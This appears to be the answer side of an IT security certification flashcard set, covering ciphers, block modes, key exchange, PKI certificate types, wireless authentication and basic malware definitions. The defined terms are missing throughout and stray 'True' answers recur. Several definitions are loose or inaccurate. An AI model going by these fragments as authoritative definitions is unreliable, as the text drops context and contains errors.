(over an unencrypted channel) uses asymmetric encryption. The secret key is encrypted with recipient's public key and is decrypted by recipient's private key.

involves sending the key by courier or transmitting it verbally. However, these methods increase the risk that the key will be compromised.

is used by Kerberos for authentication services. Single Sign-On (SSO) services rely on Kerberos.

Secret key

Gathering outside information by watching how it behaves with the goal of uncovering the encryption key. It means monitoring things like timing, power consumption, and electromagnetic emanation. These have a physical relation.

is a range of key values available to use with a particular cipher. It is approximately equivalent to two to the power of the size of the key. Using a longer key, such as 2048 bits rather than 1024 bits, makes the encryption scheme stronger.

is an obfuscation technique where each unit of plaintext is kept in the same sequence when converted to ciphertext, but the actual value of the unit changes.

the units stay the same in plaintext, but the order is changed according to a mechanism. For example, "HLOOLELWRD" would mean "HelloWorld".

is data encoded with a cipher, which is an algorithm used to encrypt or decrypt data.

is the main component of ECDHE that gives it perfect forward secrecy. There is a different secret key for each session during transport.

is the process by which an algorithm produces numbers that approximate randomness without being truly random.

is an unbreakable encryption mechanism. It consists of exactly the same number of characters as the plaintext and must be generated by a truly random algorithm.

means the key should not be derivable from the ciphertext. This can be achieved through more complex substitution and transposition operations.

means if any one bit of the plaintext is changed, many bits in the ciphertext will change. It is obtained through transposition.

is a type of trapdoor function used to generate public/private key pairs. Combined with D-H Ephemeral Mode (ECDHE), it provides a Perfect Forward Secrecy (PFS) mechanism for Transport Layer Security (TLS).

is an adaptation of ElGamal's algorithm used for encryption and digital signing, rather than simply a mechanism for agreeing to a shared secret.

can be any mathematical operation with the properties of a trapdoor function. Common groups used are group 1 (768-bit), group 2 (1024-bit), group 5 (1536-bit), and group 2048 (2048-bit).

Based on Diffie-Helmann and was invented in 1984 by Taher Elgamal. It is used in PGP implementations and GNU Privacy Guard software. The algorithm is comprised of 3 parts: the key generator, the encryption algorithm, and the decryption algorithm. This was made publicly available.

combines the ciphertext with a type of message authentication code (GMAC), like an HMAC (hash-based message authentication code), to provide native message integrity.

functions like a stream cipher, but each block is combined with a nonce (non-repeating) counter value. This allows each block to process in parallel using multi-core CPUs.

applies the same key to each plaintext block. This indicates identical plaintext blocks can output identical ciphertexts, making the ciphertext vulnerable to cryptanalysis.

improves ciphertext integrity by applying an Initialization Vector (IV) to the first plaintext block and ensures the key produces a unique ciphertext from any given plaintext.

is used in key stretching.

involves the initial key going through thousands of rounds of hashing. This makes it harder to apply brute force attacks on password hashes.

is also used for key stretching like Bcrypt.

is not a cipher, rather a cipher mode applying an Intitialization Vector (IV) to improve ciphertext integrity and ensure a unique ciphertext with any plain text.

True

is a set of standards adopted for use on government systems. The Secure Hashing Algorithm (SHA) is an example of a hashing algorithm listed there.

otates each letter 13 places (so A becomes N for instance). This is how the ciphertext "Uryyb Jbeyq" means "Hello World".

encodes a message where a value is combined with the plaintext message. XOR produces 0 if both values are the same, and 1 if the values are different.

is the password needed to gain access to a WAP. An example is a WPA2 enabled PSK. Using a personal password will not work.

True

means setting no security configurations on the WAP. It can also mean removing all other security settings like MAC filtering or disabling ports to ensure a specific setting may not be blocking network access.

is a Port-Based Network Access Control (PNAC) mechanism that uses Extensible Authentication Protocol (EAP). Selecting the "Enterprise" option on a wireless router enables the use of 802.1x.

means that multiple organizations allow access to one another's users by joining their RADIUS servers into a RADIUS hierarchy or mesh.

True

is the most common certificate loaded onto an employee's smart card. In a Windows Active Directory environment, a user certificate will identify the user, and grant user access.

is not loaded onto a card, rather installed on a machine such as a server. It identifies the machine from a trusted CA (Certificate Authority) hierarchy.

describes a certificate used with multiple subdomains of a domain. These are not usually placed on a smart card.

is an extension field on a web server certificate using multiple subdomain labels to support the identification of the server.

is a concept of the PKI (Public Key Infrastructure) to show how users and different CAs (Certificate Authorities) can trust one another. This is detailed in a certificate's certification path leading back to the root CA.

is a term used with OCSP (Online Certificate Status Protocol) that uses a SSL/TLS web server to make periodic requests from a CA about certificate statuses to reduce resource demands.

refers to validating a website's certificate by checking public keys of previously known certificates in the chain. It is not dependent on an offline CA.

is the top level of the certificate hierarchy.

is in the middle of the certificate hierarchy.

is the third level of the certificate hierarchy.

is a built-in function of certificate authorities. However, the function can be delegated to one or more of these authorities. These do not sign or issues certificates.

allows the export of a certificate along with its private key and is password protected. Commonly used to archive or transport a private key.

bundles multiple certificates into a single file. It is often used to deliver a chain of certificates that must be trusted by the processing host. It does not contain a private key.

is an actual certificate that can contain either binary DER (Distinguished Encoding Rules) or ASCII PEM data.

All certificates use an encoding scheme to create a Binary form of a certificate instead of ASCII PEM format. Can have extensions of either .der or .cer.

is a verifiable path of the leaf certificate to the root CA (Certificate Authority). Both web certificates must show the same path.

is a method of trusting digital certificates to bypass the CA hierarchy and chain of trust, and minimize MITM attacks. The client stores a public key that belongs (or is pinned) to a web server. If visiting again and the key does not exist in the certificate chain, a warning is presented.

is a Base64 ASCII file sent by a subject to a CA to get a certificate.

True

True

is issued to a software publisher. The publisher uses this to sign the executables or DLLs that make up the program and guarantee the validity of a software.

is a server assigned the task to complete identity checks and submit CSRs on behalf of end users. However, they do not actually sign or issue certificates.

is the same as a .cer file extension. It is a basic certificate that contains information about the subject.

can be described with a root server at the top-level, an intermediate or subordinate in the middle, and an issuing that issues signed certificates to users, computers, and other services.

True

refers to several techniques to ensure it is inspecting the proper certificate when a client inspects the certificate presented by a server or a code-signed application. An examples of this is submitting two or more public keys to an HTTP browser.

refers to a more rigorous check on a subject's legal identity and control over the domain before issuing a certificate.

is proving the ownership of a domain, which may be proved by responding to an email to the authorized point of contact. This process is highly vulnerable to compromise.

is a certificate standard and format.

True

are memory-resident viruses that replicate over network resources.

These spread from computer to computer, usually by "infecting" executable applications or program code.